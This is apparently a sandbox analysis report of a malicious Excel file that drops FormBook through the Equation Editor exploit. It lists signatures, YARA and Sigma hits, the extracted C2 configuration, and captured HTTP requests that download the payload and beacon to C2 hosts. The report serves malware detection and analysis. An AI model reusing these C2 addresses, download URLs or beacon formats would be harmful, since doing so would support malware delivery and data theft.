Loading ...

Play interactive tourEdit tour

Analysis Report Booking.xlsx

Overview

General Information

Sample Name:Booking.xlsx
Analysis ID:356846
MD5:889b85a1924c2498073da4f94d312cd0
SHA1:0384c76d8fcc5ca57b63a21a169198b8dbc1f31b
SHA256:3d3fc5984e22957b53d18bd58555c96b4895f4436f9ce1fed5dc2fb63878720c
Tags:FormbookMaerskVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2340 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2900 cmdline: 'C:\Users\Public\vbc.exe' MD5: CACC98CE31DE0F63F04834BF952AC3DC)
      • vbc.exe (PID: 2856 cmdline: C:\Users\Public\vbc.exe MD5: CACC98CE31DE0F63F04834BF952AC3DC)
      • vbc.exe (PID: 2848 cmdline: C:\Users\Public\vbc.exe MD5: CACC98CE31DE0F63F04834BF952AC3DC)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2256 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2640 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.vbc.exe.2342320.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          6.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            6.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            6.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x17609:$sqlite3step: 68 34 1C 7B E1
            • 0x1771c:$sqlite3step: 68 34 1C 7B E1
            • 0x17638:$sqlite3text: 68 38 2A 90 C5
            • 0x1775d:$sqlite3text: 68 38 2A 90 C5
            • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
            • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
            4.2.vbc.exe.3453630.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              Click to see the 8 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 54.67.120.65, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2340, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2340, TargetFilename: C:\Users\Public\vbc.exe
              Sigma detected: Executables Started in Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900
              Sigma detected: Execution in Non-Executable FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900
              Sigma detected: Suspicious Program Location Process StartsShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuiteAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: 6.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]ReversingLabs: Detection: 15%
              Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 15%
              Multi AV Scanner detection for submitted fileShow sources
              Source: Booking.xlsxReversingLabs: Detection: 23%
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 6.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Uses new MSVCR DllsShow sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.2218174024.0000000000859000.00000004.00000020.sdmp
              Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
              Source: excel.exeMemory has grown: Private usage: 4MB later: 36MB
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_00892CBC
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_00892CC8
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_008990D1
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_008990E0
              Source: global trafficDNS query: name: ow.ly
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.67.120.65:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.67.120.65:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: www.evolvekitchendesign.com/ffw/
              Connects to a URL shortener serviceShow sources
              Source: unknownDNS query: name: ow.ly
              Source: unknownDNS query: name: ow.ly
              Uses netstat to query active network connections and open portsShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 16:47:41 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Tue, 23 Feb 2021 13:00:36 GMTETag: "6fe00-5bc0081234afa"Accept-Ranges: bytesContent-Length: 458240Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 fc 34 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e8 06 00 00 14 00 00 00 00 00 00 86 06 07 00 00 20 00 00 00 20 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 06 07 00 4f 00 00 00 00 20 07 00 2c 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c e6 06 00 00 20 00 00 00 e8 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 11 00 00 00 20 07 00 00 12 00 00 00 ea 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 07 00 00 02 00 00 00 fc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 06 07 00 00 00 00 00 48 00 00 00 02 00 05 00 ec b8 00 00 f0 40 01 00 03 00 00 00 6e 00 00 06 dc f9 01 00 58 0c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 67 01 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a
              Source: global trafficHTTP traffic detected: GET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1Host: www.jtelitetraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1Host: www.tiwapay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewIP Address: 103.141.138.118 103.141.138.118
              Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
              Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
              Source: global trafficHTTP traffic detected: GET /6gT330rxT5U HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /findoc/svchost.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: thdyworkfinerainbotm.dns.army
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E156B3.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /6gT330rxT5U HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /findoc/svchost.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: thdyworkfinerainbotm.dns.army
              Source: global trafficHTTP traffic detected: GET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1Host: www.jtelitetraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1Host: www.tiwapay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
              Source: unknownDNS traffic detected: queries for: ow.ly
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 16:49:02 GMTServer: Apache/2.4.46 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
